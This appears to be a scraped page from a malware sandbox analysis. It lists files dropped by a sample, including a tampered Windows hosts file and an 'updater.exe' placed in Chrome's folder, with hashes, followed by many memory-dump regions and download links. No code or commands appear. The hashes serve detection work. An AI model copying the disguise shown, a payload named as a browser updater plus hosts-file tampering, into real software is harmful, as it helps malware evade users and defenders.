C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
648ff3820d388c35fefc890aafed9fa4

SHA1
641af18890d1f2c6ebbb1120be5372a1c33eb7b9

SHA256
06cf47e24b6aef78b35706f051581aac28dd934aaa961bf1401772e47814c922

SHA512
5e6469451bc22d3a857f35d4169b59d92cf98dba065cb6b84810129e7bafb1e3d48377db64424b7a303e150f0c64510c4abb7fc2cd2b258c230912d9c9be52a3

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
7.1MB

MD5
31089351b264b9b94b684cda9c4dabd4

SHA1
989fee7a30f135ecc4aed46f81c56065de579a7d

SHA256
520921b18647c7f20d20da0cb1d3f55fd87af94f587c6daee1b71a0d6432e884

SHA512
ae05e6ce2aeb9e4fd9add598560fafaba7fdb18a6db71156e77f26dbb0c96d21e703731b0f5e722ae8e01755408941eb9364d91214c1e07997cd451917d94b83

Download Submit
memory/588-108-0x0000000002ABB000-0x0000000002ADA000-memory.dmp

Filesize
124KB

Download
memory/588-102-0x000007FEF33F0000-0x000007FEF3E13000-memory.dmp

Filesize
10.1MB

Download
memory/588-103-0x000007FEF2890000-0x000007FEF33ED000-memory.dmp

Filesize
11.4MB

Download
memory/588-104-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

Filesize
12KB

Download
memory/588-105-0x000000001B800000-0x000000001BAFF000-memory.dmp

Filesize
3.0MB

Download
memory/588-107-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

Filesize
12KB

Download
memory/820-126-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/820-161-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-119-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-116-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-115-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-114-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/820-124-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-117-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-118-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-112-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/820-160-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/952-113-0x000000013F6F0000-0x00000001403E4000-memory.dmp

Filesize
13.0MB

Download
memory/1176-125-0x000007FEF3230000-0x000007FEF3D8D000-memory.dmp

Filesize
11.4MB

Download
memory/1176-123-0x000007FEF3D90000-0x000007FEF47B3000-memory.dmp

Filesize
10.1MB

Download
memory/1176-127-0x0000000001174000-0x0000000001177000-memory.dmp

Filesize
12KB

Download
memory/1176-128-0x0000000001174000-0x0000000001177000-memory.dmp

Filesize
12KB

Download
memory/1176-129-0x000000000117B000-0x000000000119A000-memory.dmp

Filesize
124KB

Download
memory/1600-144-0x000000000142B000-0x000000000144A000-memory.dmp

Filesize
124KB

Download
memory/1600-149-0x000000000142B000-0x000000000144A000-memory.dmp

Filesize
124KB

Download
memory/1600-140-0x000007FEF33F0000-0x000007FEF3E13000-memory.dmp

Filesize
10.1MB

Download
memory/1600-141-0x000007FEF2890000-0x000007FEF33ED000-memory.dmp

Filesize
11.4MB

Download
memory/1600-143-0x0000000001424000-0x0000000001427000-memory.dmp

Filesize
12KB

Download
memory/1708-92-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1708-94-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1708-83-0x000007FEF3D90000-0x000007FEF47B3000-memory.dmp

Filesize
10.1MB

Download
memory/1708-85-0x000007FEF3230000-0x000007FEF3D8D000-memory.dmp

Filesize
11.4MB

Download
memory/1708-96-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/1736-99-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-61-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-57-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-55-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-66-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-58-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/1736-54-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-56-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-67-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/1736-100-0x0000000076EF0000-0x0000000077099000-memory.dmp

Filesize
1.7MB

Download
memory/1736-60-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1736-59-0x000000013F280000-0x000000013FF74000-memory.dmp

Filesize
13.0MB

Download
memory/1908-63-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

Filesize
8KB

Download
memory/1908-68-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/1908-71-0x000000000243B000-0x000000000245A000-memory.dmp

Filesize
124KB

Download
memory/1908-64-0x000007FEF33F0000-0x000007FEF3E13000-memory.dmp

Filesize
10.1MB

Download
memory/1908-65-0x000007FEF2890000-0x000007FEF33ED000-memory.dmp

Filesize
11.4MB

Download
memory/1908-70-0x0000000002434000-0x0000000002437000-memory.dmp

Filesize
12KB

Download
memory/1908-69-0x000000000243B000-0x000000000245A000-memory.dmp

Filesize
124KB

Download
memory/1988-162-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1988-163-0x0000000000100000-0x0000000000120000-memory.dmp

Filesize
128KB

Download
memory/1988-166-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download